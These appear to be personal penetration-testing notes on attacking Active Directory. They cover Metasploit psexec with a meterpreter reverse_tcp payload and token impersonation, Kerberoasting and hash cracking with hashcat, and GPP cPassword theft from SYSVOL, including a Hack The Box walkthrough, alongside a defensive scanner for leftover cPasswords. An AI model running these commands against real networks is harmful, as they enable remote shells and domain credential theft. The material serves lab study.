Active Directory
// AD
python
import socket
conn = socket.create_connection(('10.129.238.232', 23))  # raw TCP connection to the telnet port
curl -v telnet://10.129.238.232:23
use exploit/windows/smb/psexec
set target 2
set payload windows/x64/meterpreter/reverse_tcp
options
set LHOST eth0
load incognito          # type "load" and press Tab twice to list the available extensions
list_tokens -u
impersonate_token "domain\\administrator"
rev2self                # drop back to the original token
Kerberoasting
cd /opt/impacket/examples
python GetUserSPNs.py <DOMAIN>/<username>:<password> -dc-ip <ip of DC> -request
# e.g. python GetUserSPNs.py domain.local/username:password -dc-ip 192.168.1.1 -request
save the returned hash (starts with $krb5tgs$) to a file, e.g. hash4.txt
hashcat --help | grep Kerberos      # look up the mode number for this hash type
hashcat64.exe -m 13100 hash4.txt rockyou.txt -O
GPP (Group Policy Preferences) attack:
Group Policy Preferences allowed admins to create policies with embedded credentials (e.g. for local accounts or scheduled tasks).
These credentials were AES-encrypted and stored in a "cPassword" attribute inside XML files on the domain's SYSVOL share, which every domain user can read.
The AES key was accidentally released (whoops); MS14-025 stopped new credentials from being stored this way, but did not remove the ones already in place.
So any foothold on any domain system leaks every credential still stored in Group Policy Preferences.
https://blog.rapid7.com/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
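Added example, not part of the original notes: a defender-side scanner that walks a copy of SYSVOL (or any directory of GPP XML files) and reports every element still carrying a cPassword attribute, so leftover credentials can be found and removed. The inline Groups.xml, its domain and account names, and the placeholder cpassword value are constructed.

```python
import os
import xml.etree.ElementTree as ET

# Constructed sample in the layout of a SYSVOL Groups.xml preference file.
# Names and the cpassword value are placeholders, not taken from any real domain.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="EXAMPLE\\svc_sample" changed="2014-01-01 00:00:00">
    <Properties action="U" cpassword="CONSTRUCTED-PLACEHOLDER-VALUE=="
                neverExpires="1" userName="EXAMPLE\\svc_sample"/>
  </User>
  <User name="EXAMPLE\\svc_clean" changed="2014-01-01 00:00:00">
    <Properties action="U" userName="EXAMPLE\\svc_clean"/>
  </User>
</Groups>
"""


def find_cpassword(xml_text, source="<inline>"):
    """Return one finding per XML element that carries a non-empty cpassword attribute.

    The attribute name is matched case-insensitively ("cpassword" on disk, "cPassword"
    in most write-ups). The value itself is never returned, only its length.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            if attr.lower() == "cpassword" and value:
                findings.append({
                    "file": source,
                    "element": elem.tag,
                    "user": elem.get("userName") or elem.get("name", ""),
                    "length": len(value),
                })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL copy (e.g. its Policies tree) and collect findings from every .xml file."""
    findings = []
    for dirpath, _, filenames in os.walk(root_dir):
        for fn in filenames:
            if not fn.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    findings.extend(find_cpassword(fh.read(), path))
            except ET.ParseError:
                continue  # not a well-formed preference file; skip it
    return findings


if __name__ == "__main__":
    import sys
    hits = scan_sysvol(sys.argv[1]) if len(sys.argv) > 1 else find_cpassword(SAMPLE_GROUPS_XML, "sample Groups.xml")
    for h in hits:
        print(f"{h['file']}: <{h['element']}> userName={h['user']!r} still stores a {h['length']}-char cpassword")
```

Run it with the path to a SYSVOL copy as the first argument; with no argument it scans the constructed sample and reports the one account that still has a stored password.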
use auxiliary/scanner/smb/smb_enum_gpp    # set RHOSTS, SMBUser and SMBPass first
run
HTB - "Active" machine
smbclient -L //10.10.10.100 -N                 # list shares anonymously
smbclient //10.10.10.100/Replication -N        # connect to the Replication share (a copy of SYSVOL)
recurse on
prompt off
mget *                                         # pull the whole tree; look for Groups.xml under Policies
gpp-decrypt <cPassword value>